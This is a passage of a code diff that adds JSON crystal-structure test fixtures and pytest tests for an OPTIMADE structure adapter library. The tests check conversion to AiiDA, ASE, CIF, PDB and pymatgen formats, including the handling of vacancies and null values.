"name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-H-N-O-S" + } + }, + { + "id": "mpf_3803", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.943000", + "elements": [ + "Ba", + "Ce", + "Fe", + "H", + "Na", + "O", + "Si", + "Ti" + ], + "nelements": 8, + "elements_ratios": [ + 0.045454545454545456, + 0.045454545454545456, + 0.022727272727272728, + 0.022727272727272728, + 0.022727272727272728, + 0.6136363636363636, + 0.18181818181818182, + 0.045454545454545456 + ], + "chemical_formula_descriptive": "Ba2NaCe2Ti2FeSi8HO27", + "chemical_formula_reduced": "Ba2NaCe2Ti2FeSi8HO27", + "chemical_formula_anonymous": "A27B8C2D2E2FGH", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 3.6001175409341037, + 0, + 0 + ], + [ + 0, + 4.438478811675378, + 0 + ], + [ + 0, + 0, + 7.718814146224643 + ] + ], + "cartesian_site_positions": [ + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 
0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 
0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ] + ], + "nsites": 44, + "species_at_sites": [ + "Ba", + "Ba", + "Ce", + "Ce", + "Fe", + "H", + "Na", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Ti", + "Ti" + ], + "species": [ + { + "name": "Ba", + "chemical_symbols": [ + "Ba" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ce", + "chemical_symbols": [ + "Ce" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Fe", + "chemical_symbols": [ + "Fe" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Na", + "chemical_symbols": [ + "Na" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Si", + "chemical_symbols": [ + "Si" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ti", + "chemical_symbols": [ + "Ti" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ba-Ce-Fe-H-Na-O-Si-Ti" + } + }, + { + "id": "mpf_3819", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.945000", + "elements": [ + "Ba", + "F", + "H", + "Mn", + "Na", + "O", + "Re", + "Si", + "Ti" + ], + "nelements": 9, + 
"elements_ratios": [ + 0.045454545454545456, + 0.022727272727272728, + 0.022727272727272728, + 0.022727272727272728, + 0.022727272727272728, + 0.5909090909090909, + 0.045454545454545456, + 0.18181818181818182, + 0.045454545454545456 + ], + "chemical_formula_descriptive": "Ba2NaTi2MnRe2Si8HO26F", + "chemical_formula_reduced": "Ba2NaTi2MnRe2Si8HO26F", + "chemical_formula_anonymous": "A26B8C2D2E2FGHI", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 0.541264110585089, + 0, + 0 + ], + [ + 0, + 0.5211563701526833, + 0 + ], + [ + 0, + 0, + 4.063577553377723 + ] + ], + "cartesian_site_positions": [ + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 
0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, 
+ 0.24056412649964642 + ] + ], + "nsites": 44, + "species_at_sites": [ + "Ba", + "Ba", + "F", + "H", + "Mn", + "Na", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "Re", + "Re", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Ti", + "Ti" + ], + "species": [ + { + "name": "Ba", + "chemical_symbols": [ + "Ba" + ], + "concentration": [ + 1 + ] + }, + { + "name": "F", + "chemical_symbols": [ + "F" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Mn", + "chemical_symbols": [ + "Mn" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Na", + "chemical_symbols": [ + "Na" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Re", + "chemical_symbols": [ + "Re" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Si", + "chemical_symbols": [ + "Si" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ti", + "chemical_symbols": [ + "Ti" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ba-F-H-Mn-Na-O-Re-Si-Ti" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dummy/2019", + "type": "references" + } + ] + } + } + } +] \ No newline at end of file diff --git a/tests/adapters/structures/special_species.json b/tests/adapters/structures/special_species.json new file mode 100644 index 00000000..530aee1e --- /dev/null +++ b/tests/adapters/structures/special_species.json @@ -0,0 +1,140 @@ +[ + { + "id": "mpf_1", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ac", + "chemical_formula_reduced": "Ac", + "chemical_formula_anonymous": "A", + 
"dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2503264826932692, + 0, + 0 + ], + [ + 0, + 9.888509716321765, + 0 + ], + [ + 0, + 0, + 0.2972637673241818 + ] + ], + "cartesian_site_positions": [ + [ + 0.17570227444196573, + 0.17570227444196573, + 0.17570227444196573 + ] + ], + "nsites": 1, + "species_at_sites": [ + "Ac" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": ["Ac", "vacancy"], + "concentration": [0.9, 0.1] + } + ], + "structure_features": ["disorder"], + "_exmpl_chemsys": "Ac" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_1", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ac", + "chemical_formula_reduced": "Ac", + "chemical_formula_anonymous": "A", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2503264826932692, + 0, + 0 + ], + [ + 0, + 9.888509716321765, + 0 + ], + [ + 0, + 0, + 0.2972637673241818 + ] + ], + "cartesian_site_positions": [ + [ + 0.17570227444196573, + 0.17570227444196573, + 0.17570227444196573 + ] + ], + "nsites": 1, + "species_at_sites": [ + "AcX" + ], + "species": [ + { + "name": "AcX", + "chemical_symbols": ["Ac", "X"], + "concentration": [0.9, 0.1] + } + ], + "structure_features": ["disorder"], + "_exmpl_chemsys": "AcX" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + } +] \ No newline at end of file diff --git a/tests/adapters/structures/test_aiida.py b/tests/adapters/structures/test_aiida.py new file mode 100644 index 00000000..0f5ba9db --- /dev/null +++ b/tests/adapters/structures/test_aiida.py @@ -0,0 +1,62 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from 
.utils import get_min_ver + +min_ver = get_min_ver("aiida-core") +aiida = pytest.importorskip( + "aiida", + minversion=min_ver, + reason=f"aiida-core must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from aiida import load_profile + +load_profile() + +from aiida.orm import StructureData + +from optimade.models.structures import Periodicity + +from optimade.adapters import Structure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.aiida import get_aiida_structure_data + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_aiida_structure_data(Structure(structure)), StructureData) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_aiida_structure_data(null_position_structure), StructureData) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance( + get_aiida_structure_data(null_lattice_vector_structure), StructureData + ) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + assert isinstance(get_aiida_structure_data(structure), StructureData) + + if "vacancy" in structure.attributes.species[0].chemical_symbols: + assert get_aiida_structure_data(structure).has_vacancies + assert not get_aiida_structure_data(structure).is_alloy + else: + assert not get_aiida_structure_data(structure).has_vacancies + assert get_aiida_structure_data(structure).is_alloy diff --git a/tests/adapters/structures/test_ase.py b/tests/adapters/structures/test_ase.py new file mode 100644 index 00000000..f55edfcc --- /dev/null +++ b/tests/adapters/structures/test_ase.py @@ -0,0 +1,53 
@@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("ase") +ase = pytest.importorskip( + "ase", + minversion=min_ver, + reason=f"ase must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from ase import Atoms + +from optimade.models.structures import Periodicity + +from optimade.adapters import Structure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.ase import get_ase_atoms + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_ase_atoms(Structure(structure)), Atoms) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_ase_atoms(null_position_structure), Atoms) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_ase_atoms(null_lattice_vector_structure), Atoms) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + with pytest.raises( + ConversionError, + match="ASE cannot handle structures with partial occupancies", + ): + get_ase_atoms(structure) diff --git a/tests/adapters/structures/test_cif.py b/tests/adapters/structures/test_cif.py new file mode 100644 index 00000000..12061a29 --- /dev/null +++ b/tests/adapters/structures/test_cif.py @@ -0,0 +1,44 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + 
reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.adapters import Structure +from optimade.adapters.structures.cif import get_cif + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_cif(Structure(structure)), str) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_cif(null_position_structure), str) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_cif(null_lattice_vector_structure), str) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + assert isinstance(get_cif(structure), str) diff --git a/tests/adapters/structures/test_pdb.py b/tests/adapters/structures/test_pdb.py new file mode 100644 index 00000000..e4aed1f4 --- /dev/null +++ b/tests/adapters/structures/test_pdb.py @@ -0,0 +1,44 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.adapters import Structure +from optimade.adapters.structures.proteindatabank import get_pdb + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_pdb(Structure(structure)), str) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert 
isinstance(get_pdb(null_position_structure), str) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_pdb(null_lattice_vector_structure), str) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + assert isinstance(get_pdb(structure), str) diff --git a/tests/adapters/structures/test_pdbx_mmcif.py b/tests/adapters/structures/test_pdbx_mmcif.py new file mode 100644 index 00000000..6231baf6 --- /dev/null +++ b/tests/adapters/structures/test_pdbx_mmcif.py @@ -0,0 +1,44 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.adapters import Structure +from optimade.adapters.structures.proteindatabank import get_pdbx_mmcif + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_pdbx_mmcif(Structure(structure)), str) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_pdbx_mmcif(null_position_structure), str) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_pdbx_mmcif(null_lattice_vector_structure), str) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) 
+ + assert isinstance(get_pdbx_mmcif(structure), str) diff --git a/tests/adapters/structures/test_pymatgen.py b/tests/adapters/structures/test_pymatgen.py new file mode 100644 index 00000000..ee22823c --- /dev/null +++ b/tests/adapters/structures/test_pymatgen.py @@ -0,0 +1,63 @@ +# pylint: disable=import-error +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("pymatgen") +pymatgen = pytest.importorskip( + "pymatgen", + minversion=min_ver, + reason=f"pymatgen must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from pymatgen import Molecule, Structure as PymatgenStructure + +from optimade.models.structures import Periodicity + +from optimade.adapters import Structure +from optimade.adapters.structures.pymatgen import ( + get_pymatgen, + _get_structure, + _get_molecule, +) + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance( + get_pymatgen(Structure(structure)), (PymatgenStructure, Molecule) + ) + + +def test_successful_conversion_structure(structure): + """Make sure its possible to convert to pymatgen Structure""" + assert isinstance(_get_structure(structure), PymatgenStructure) + assert isinstance(get_pymatgen(structure), PymatgenStructure) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled + + This also respresents a test for successful conversion to pymatgen Molecule + """ + assert isinstance(_get_molecule(null_lattice_vector_structure), Molecule) + assert isinstance(get_pymatgen(null_lattice_vector_structure), Molecule) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_pymatgen(null_position_structure), PymatgenStructure) + assert isinstance(_get_structure(null_position_structure), PymatgenStructure) + assert 
isinstance(_get_molecule(null_position_structure), Molecule) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + assert isinstance(get_pymatgen(structure), PymatgenStructure) diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py new file mode 100644 index 00000000..d058d093 --- /dev/null +++ b/tests/adapters/structures/test_structures.py @@ -0,0 +1,144 @@ +import pytest + +from optimade.adapters import Structure +from optimade.models import StructureResource + +try: + import aiida + import ase + import numpy + import pymatgen +except ImportError: + all_modules_found = False +else: + all_modules_found = True + + +class TestStructure: + """Test Structure adapter""" + + def test_instantiate(self, RAW_STRUCTURES): + """Try instantiating Structure for all raw test structures""" + for structure in RAW_STRUCTURES: + new_Structure = Structure(structure) + assert isinstance(new_Structure.entry, StructureResource) + + def test_setting_entry(self, capfd, RAW_STRUCTURES): + """Make sure entry can only be set once""" + structure = Structure(RAW_STRUCTURES[0]) + structure.entry = RAW_STRUCTURES[1] + captured = capfd.readouterr() + assert "entry can only be set once and is already set." in captured.out + + def test_convert(self, structure): + """Test convert() works + Choose currently known entry type - must be updated if no longer available. + """ + if not structure._type_converters: + pytest.fail("_type_converters is seemingly empty. This should not be.") + + chosen_type = "cif" + if chosen_type not in structure._type_converters: + pytest.fail( + f"{chosen_type} not found in _type_converters: {structure._type_converters} - " + "please update test tests/adapters/structures/test_structures.py:TestStructure." 
+ "test_convert()" + ) + + converted_structure = structure.convert(chosen_type) + assert isinstance(converted_structure, (str, None.__class__)) + assert converted_structure == structure._converted[chosen_type] + + def test_convert_wrong_format(self, structure): + """Test AttributeError is raised if format does not exist""" + nonexistant_format = 0 + right_wrong_format_found = False + while not right_wrong_format_found: + if str(nonexistant_format) not in structure._type_converters: + nonexistant_format = str(nonexistant_format) + right_wrong_format_found = True + else: + nonexistant_format += 1 + + with pytest.raises( + AttributeError, + match=f"Non-valid entry type to convert to: {nonexistant_format}", + ): + structure.convert(nonexistant_format) + + def test_getattr_order(self, structure): + """The order of getting an attribute should be: + 1. `as_<entry type format>` + 2. `<entry type attribute>` + 3. `<entry type attributes attributes>` + 4. `raise AttributeError` with custom message + """ + # If passing attribute starting with `as_`, it should call `self.convert()` + with pytest.raises( + AttributeError, match=f"Non-valid entry type to convert to: " + ): + structure.as_ + + # If passing valid StructureResource attribute, it should return said attribute + # Test also nested attributes with `getattr()`. + for attribute, attribute_type in ( + ("id", str), + ("species", list), + ("attributes.species", list), + ): + assert isinstance(getattr(structure, attribute), attribute_type) + + # Otherwise, it should raise AttributeError + for attribute in ("nonexistant_attribute", "attributes.nonexistant_attribute"): + with pytest.raises(AttributeError, match=f"Unknown attribute: {attribute}"): + getattr(structure, attribute) + + @pytest.mark.skipif( + all_modules_found, + reason="This test checks what happens if a conversion-dependent module cannot be found. 
" + "All could be found, i.e., it has no meaning.", + ) + def test_no_module_conversion(self, structure): + """Make sure a warnings is raised and None is returned for conversions with non-existing modules""" + import importlib + + CONVERSION_MAPPING = { + "aiida": ["aiida_structuredata"], + "ase": ["ase"], + "numpy": ["cif", "pdb", "pdbx_mmcif"], + "pymatgen": ["pymatgen"], + } + + modules_to_test = [] + for module in ("aiida", "ase", "numpy", "pymatgen"): + try: + importlib.import_module(module) + except (ImportError, ModuleNotFoundError): + modules_to_test.append(module) + + if not modules_to_test: + pytest.fail( + "No modules found to test - it seems all modules are installed." + ) + + for module in modules_to_test: + for conversion_function in CONVERSION_MAPPING[module]: + with pytest.warns( + UserWarning, match="not found, cannot convert structure to" + ): + converted_structure = structure.convert(conversion_function) + assert converted_structure is None + + def test_common_converters(self, raw_structure, RAW_STRUCTURES): + """Test common converters""" + structure = Structure(raw_structure) + + assert structure.as_json == StructureResource(**raw_structure).json() + assert structure.as_dict == StructureResource(**raw_structure).dict() + + # Since calling .dict() and .json() will return also all default-valued properties, + # the raw structure should at least be a sub-set of the resource's full list of properties. 
+ for raw_structure in RAW_STRUCTURES: + raw_structure_property_set = set(raw_structure.keys()) + resource_property_set = set(Structure(raw_structure).as_dict.keys()) + assert raw_structure_property_set.issubset(resource_property_set) diff --git a/tests/adapters/structures/test_utils.py b/tests/adapters/structures/test_utils.py new file mode 100644 index 00000000..e4a7eb17 --- /dev/null +++ b/tests/adapters/structures/test_utils.py @@ -0,0 +1,138 @@ +import math + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.models import StructureResource + +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.utils import ( + _pad_iter_of_iters, + cell_to_cellpar, + fractional_coordinates, + pad_cell, + pad_positions, + scaled_cell, +) + + +# TODO: Add tests for cell_to_cellpar, unit_vector, cellpar_to_cell + + +def test_pad_positions(null_position_structure): + """Make sure None values in cartesian_site_positions are converted to padding float value""" + positions, padded_position = pad_positions( + null_position_structure.attributes.cartesian_site_positions + ) + + assert not any(value is None for vector in positions for value in vector) + assert padded_position + + positions, padded_position = pad_positions(positions) + + assert not any(value is None for vector in positions for value in vector) + assert not padded_position + + +def test_pad_cell(null_lattice_vector_structure): + """Make sure None values in lattice_vectors are converted to padding float value""" + lattice_vectors, padded_cell = pad_cell( + null_lattice_vector_structure.attributes.lattice_vectors + ) + + assert not any(value is None for vector in lattice_vectors for value in vector) + assert padded_cell + + lattice_vectors, padded_cell = 
pad_cell(lattice_vectors) + + assert not any(value is None for vector in lattice_vectors for value in vector) + assert not padded_cell + + +def test__pad_iter_of_iters(): + """Test _pad_iter_of_iters""" + iterable = [(0.0,) * 3, (0.0,) * 3, (None,) * 3] + + padded_iterable, padded_iterable_bool = pad_cell(iterable) + + assert padded_iterable_bool + assert all(math.isnan(_) for _ in padded_iterable[-1]) + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + for valid_padding_value in (3.0, 3, "3", "3.0"): + padded_iterable, padded_iterable_bool = pad_cell(iterable, valid_padding_value) + + assert padded_iterable_bool + assert padded_iterable[-1] == (float(valid_padding_value),) * 3 + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + # Since nan != nan, the above for-loop cannot be used for nan + valid_padding_value = "nan" + padded_iterable, padded_iterable_bool = pad_cell(iterable, valid_padding_value) + + assert padded_iterable_bool + assert all(math.isnan(_) for _ in padded_iterable[-1]) + assert all(math.isnan(_) for _ in (float(valid_padding_value),) * 3) + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + invalid_padding_value = "x" + padded_iterable, padded_iterable_bool = pad_cell(iterable, invalid_padding_value) + + assert padded_iterable_bool + assert all(math.isnan(_) for _ in padded_iterable[-1]) + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + +def test_scaled_cell_and_fractional_coordinates(structures): + """Make sure these two different calculations arrive at the same result""" + for structure in structures: + scale = scaled_cell(structure.lattice_vectors) + scale = numpy.asarray(scale) + cartesian_positions = numpy.asarray(structure.cartesian_site_positions) + scaled_fractional_positions = 